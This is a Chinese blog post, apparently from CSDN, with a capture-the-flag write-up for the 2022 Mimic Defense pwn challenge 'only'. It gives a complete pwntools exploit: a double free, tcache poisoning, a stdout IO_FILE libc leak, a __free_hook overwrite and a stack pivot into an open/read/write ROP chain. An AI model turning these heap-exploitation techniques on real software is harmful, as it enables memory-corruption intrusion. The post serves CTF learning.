2022拟态防御pwn(only)

最新推荐文章于 2023-06-08 21:44:14 发布
最新推荐文章于 2023-06-08 21:44:14 发布
阅读量322 收藏
点赞数 9
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63437215/article/details/127784619
版权

安全 python 网络安全

题目分析

 

在delete函数里存在double free漏洞。

这个函数允许我们造成一次double free。

由于本题限制我们只能控制一个指针,但是因为开启沙箱,导致tcachebin里有许多可以用的空闲chunk,那么我们可以通过double free漏洞修改空闲指针为IO结构体,然后修改IO泄露libc,有1/256的概率成功,在本地调试的话关闭地址随机化就行了。泄露之后通过改freehook为gadget实现迁移执行orw。

exp

from pwn import *
context.log_level='debug'
r=process('./only')
elf=ELF('./only')
libc=elf.libc

def backdoor():
    r.sendlineafter("Choice >> ",'0')

def add(size,content):
    r.sendlineafter("Choice >> ",'1')
    r.sendlineafter("Size:",str(size))
    r.sendafter("Content:",content)
    
def delete():
    r.sendlineafter("Choice >> ",'2')
    
add(0xe0,'\n')
delete()
backdoor()
delete()
add(0xe0,'\xf0\xd7\n')
add(0xe0,'\xf0\xd7\n')
add(0xe0,p64(0)+p64(0x491)+'\x00\xd8\n')
add(0x60,'\n')
delete()
add(0x20,'\xa0\x16\n')
add(0x60,'\n')
payload=p64(0xfbad1887)+p64(0)*3+'\x00\n'
add(0x60,payload)
leak=u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print("leak->",hex(leak))
libc_base=leak-libc.sym['_IO_2_1_stdin_']
print("libc_base->",hex(libc_base))

pop_rax=libc_base+0x0000000000047400
pop_rdi=libc_base+0x0000000000023b72
pop_rsi=libc_base+0x000000000002604f
pop_rdx_r12=libc_base+0x0000000000119241
pop_rbp=libc_base+0x00000000000226c0
free_hook=libc_base+libc.sym['__free_hook']
open=libc_base+libc.sym['open']
read=libc_base+libc.sym['read']
write=libc_base+libc.sym['write']
gadget=libc_base+0x00000000001518B0#mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];
mov_rsp_rdx=libc_base+0x00000005b500
gets=libc_base+libc.sym['gets']
add(0xe0,p64(0)*7+p64(0x81)+p64(free_hook)+'\n')#0x80->free_hook
add(0x70,p64(0)+'\n')
print("pop_rbp->",hex(pop_rbp))
add(0x70,p64(gadget)+p64(free_hook+0x10)+p64(pop_rbp)+p64(free_hook)+p64(gets)+p64(0)+p64(mov_rsp_rdx)+'\n')
flagaddr=libc_base+0x1eeef0
payload='a'*0x20+p64(free_hook)+p64(pop_rdi)+p64(flagaddr)+p64(pop_rsi)+p64(0)+p64(open)+p64(pop_rdi)
payload+=p64(3)+p64(pop_rsi)+p64(flagaddr)+p64(pop_rdx_r12)+p64(0x30)*2+p64(read)+p64(pop_rdi)
payload+=p64(1)+p64(write)+'flag\x00'
gdb.attach(r)
delete()
r.sendline(payload)
r.interactive()

 分析

add(0xe0,'\n')
delete()
backdoor()
delete()

制造double free

add(0xe0,'\xf0\xd7\n')
add(0xe0,'\xf0\xd7\n')
add(0xe0,p64(0)+p64(0x491)+'\x00\xd8\n')
add(0x60,'\n')
delete()

然后修改指针,使其指向0x55555555d7f0堆块,申请之后将原本在0x70空闲chunk的0x55555555d800堆块修改size为unsortedbin满足的大小,并且将指针指向自己,然后释放

 

 

add(0x20,'\xa0\x16\n')
add(0x60,'\n')
payload=p64(0xfbad1887)+p64(0)*3+'\x00\n'
add(0x60,payload)
leak=u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print("leak->",hex(leak))
libc_base=leak-libc.sym['_IO_2_1_stdin_']
print("libc_base->",hex(libc_base))

 然后从unsortedbin中申请0x20堆块并且修改后两位为stdout,此时0x70链就连上了stdout,然后申请两个堆块后将stdout结构体修改从而泄露libc。

 此时我们注意到:大堆块覆盖掉了在tcachebin里的堆块,那我们可以通过申请一个堆块来改写这个在0x80空闲chunk的指针使其指向freehook,从而向freehook里写入gadget。

 

add(0xe0,p64(0)*7+p64(0x81)+p64(free_hook)+'\n')#0x80->free_hook
add(0x70,p64(0)+'\n')
print("pop_rbp->",hex(pop_rbp))
add(0x70,p64(gadget)+p64(free_hook+0x10)+p64(pop_rbp)+p64(free_hook)+p64(gets)+p64(0)+p64(mov_rsp_rdx)+'\n')
flagaddr=libc_base+0x1eeef0
payload='a'*0x20+p64(free_hook)+p64(pop_rdi)+p64(flagaddr)+p64(pop_rsi)+p64(0)+p64(open)+p64(pop_rdi)
payload+=p64(3)+p64(pop_rsi)+p64(flagaddr)+p64(pop_rdx_r12)+p64(0x30)*2+p64(read)+p64(pop_rdi)
payload+=p64(1)+p64(write)+'flag\x00'
gdb.attach(r)
delete()
r.sendline(payload)
r.interactive()

 此时freehook里的结构

 

动态调试

si进入free函数调用

看到此时rax和rdi都为freehook

 

 

 

开始执行我们的gadget,分析一下这个gadget。首先将rdi+8位置的值(free_hook+0x10) 给rdx,然后将rsp迁移到gadget,最后执行rdx+0x20(mov_rsp_rdx)

si步入

将rsp迁移至rdx(pop_rbp)的位置,执行pop rbp之后rsp=rsp+8(gets函数),然后ret执行gets。

 

 

 payload构造

由于在gets函数最后

 先让rsp+8,然后执行四个pop,所以我们的orw链应该从0x28处开始写。然后执行ret之后正好返回我们的orw链,从而劫持程序执行流打印flag。

 

 flag地址的确定

 通过查看栈找到我们写的flag位置,然后减去libc(因为我们的orw链在freehook中,所以与libc偏移固定)。

 

KingKi1L3r
关注
2022强网拟态pwn-only
z1r0的博客
11-23 415
所以攻击思路大致是这样的,任意地址申请到tcache管理这里,打出290的key为7,这样再释放之后290这里会进入unsortedbin中,打刚刚释放的这个地方到stdout那里去泄露出libc。这里需要爆破,泄露出libc之后继续利用unsortedbin的分割来打hook到tcache里,接着申请出来,打hook为magic_gadget。这里的magic_gadget就是2.31下的orw的magic_gadget。这里需要注意的是seccomp上的沙箱,所以堆上会有残留的bins。
[阅读型]CTF中linux pwn的四大基本防御措施
easy_level1的博客
04-13 1820
讨论linux pwn中对二进制文件常见的四个基本防御措施 RELRO NX CANARY PIE
2022拟态防御pwn(bfbf)
m0_63437215的博客
11-07 495
2022拟态防御pwn
pwn3-绕过防御-ROP(1)
最新发布
qq_73667990的博客
06-08 820
*ROP:**全程Return Oriented Programming(面向返回的编程),在栈溢出基础上,利用程序中已有的小片段(gadgets),改变寄存器或变量的值,从而控制程序执行流程,从而绕过NX防御,常见有ret2text,ret2syscall,ret2libc(最常用)…**gadgets:**以ret结尾的指令序列,通过这些序列可以修改某些地址的内容。ROP攻击满足的条件:1.存在溢出,且可以控制返回地址2.满足条件的gadgets。
pwn学习笔记4】攻防世界pwn进阶(pwn100和pwn200)
weixin_45927195的博客
05-22 390
64位和32位传参pwn100pwn200 pwn100 先查看防御机制。64位程序。开启了NX保护,即堆栈不可执行,直接往栈上注入代码难以发挥效果。 同时开启了Partial RELRO,意味着got表可写。 用ida查看伪代码。发现存在明显的栈溢出漏洞: 但是找不到system函数和binsh字符串,想到用ROP的方法。 这道题跟wiki上的 ret2csu 应该是同一种类型。 确定大概的思路是: 1.泄露出sys的地址,同时利用栈溢出修改返回地址,让程序跳回到开始点,准备下一次输入输出。 2.找一段
内生安全拟态防御PPT
09-05
内生安全拟态防御PPT 内生安全是指一种对象模型拥有广义鲁棒控制构造,能在不依赖关于攻击者先验知识和行为特征信息的情况下,将基于模型内部漏洞后门等“暗功能”的不确定扰动,归一化为可用概率表达的传统可靠...
第四届“强网”拟态防御国际精英挑战赛.zip
12-07
拟态防御 CTF 国际精英挑战赛
web 服务器拟态防御原理验证系统测试与分析1
08-03
拟态防御原理】 拟态防御是一种网络安全防御策略,其核心思想是通过构建系统内部的异构性和冗余性,使攻击者无法准确预测和理解系统的运行模式,从而达到干扰和阻断网络攻击的目的。在Web服务器拟态防御原理验证...
一种基于拟态防御的差异化反馈调度判决算法
01-19
面对服务路径的安全性问题,根据拟态防御理论里的基于动态异构冗余(dynamic heterogeneous redundancy,DHR)模型的服务功能链部署拟态防御体系架构,并结合服务路径部署的实际需求,提出了一种基于拟态防御的差异...
拟态防御马尔可夫博弈模型及防御策略选择
01-14
网络拟态防御通过冗余执行体动态性、多样性以及裁决反馈机制增强了主动防御顽健性,而对于其安全性评估尚缺少有效的分析模型,基于经典博弈模型无法满足于其多状态、动态性特点,不具有通用性等问题,提出拟态防御 ...
第五届“强网”拟态防御PWN1与近段时间对unlink的理解
Probeginner的博客
11-06 326
来个拟态防御简单一题
Double free 漏洞复现与利用
vivid_moon的博客
05-29 5668
2018体系结构安全大作业申明:转载请注明出处选题:2015 年 0ctf 题题目描述:提供记事本功能的二进制文件,找出其漏洞,get shell第一章 操作说明为方便老师审核作业,本报告将操作说明放在第一章。操作流程如下:1 、安装 netcat 。2 、安装 pwntools 库。命令: pip install pwntools (安装过程中,一定要保证网络畅通,曾经因为网不好装这个库装了一个...
pwn学习之路
飞花的世界
04-15 3001
最近也开始学习pwn了。。。网站平台是http://pwnable.kr/play.php网址是http://pwnable.kr/play.php第三题,代码如下#include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32];...
AWD 一个RE手的PWN机防守有感
Air_cat的博客
12-12 1650
AWD 一个RE手的PWN机防守有感 ①遇到free,不要犹豫,直接patch,我再说一遍,直接patch,全patch,通通patch ②不要试图去干涉数值,除非你十分做好了check down的心理准备
pwn中堆溢出的几种模式及相应的利用方法小结
snowleopard_bin的博客
08-01 2703
一、fastbin(16Bytes<= size<=64Bytes )    1、覆盖fd , 向任意地址写任意内容(write-anything-anywhere) buf1 = malloc(32)#1 buf2 = malloc(32)#2 free(2) free(1)#first one to be allocated buf1 ...
pwn学习笔记3】整数溢出(攻防世界新手pwn题)
weixin_45927195的博客
03-14 725
利用整数溢出 先检查防御机制,开启了NX保护,即堆栈不可执行。 先试着随便输入些字符,发现选择1后共输入2次,而且success了。 用ida查看主函数,既然只能选择1那就查看选择1后执行的函数login()。输入的buf规定长度为0x199u,即409。 继续查看check_passwd()函数。因为v3只有一个字节,可想到当传入的密码长度足够长时可以利用整数溢出的原理,使其统计的长度仍在...
pwn学习总结(一) —— 常用命令
qq_41988448的博客
11-18 3203
pwn学习笔记(一)介绍 介绍
llvm pwn入门--第一篇
m0_63437215的博客
04-19 583
llvm入门
CTF(Pwn) 当题目为我们提供Libc版本.so文件, 与 不提供的区别
半岛铁盒的博客
03-25 4934
做了一道题目,它提供了 libc文件; 这道题 可以使用 libc-2.23.so文件 来 解出来, 也可以不使用; 当使用 libc2.23.so文件时 EXp为 from pwn import * p = remote("node3.buuoj.cn",29829) libc=ELF('libc-2.23.so') elf = ELF('./pwn1') write_plt = elf.plt['write'] write_got = elf.got['write'] main = 0x0804
内生安全拟态防御技术解析
"内生安全拟态防御网络安全领域的一种新型防护理念和技术,由邬江兴在中国紫金山实验室提出。这种技术旨在构建系统内在的安全性,不依赖于对攻击者的先验知识和行为特征,而是通过特殊的系统设计来应对各种不...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值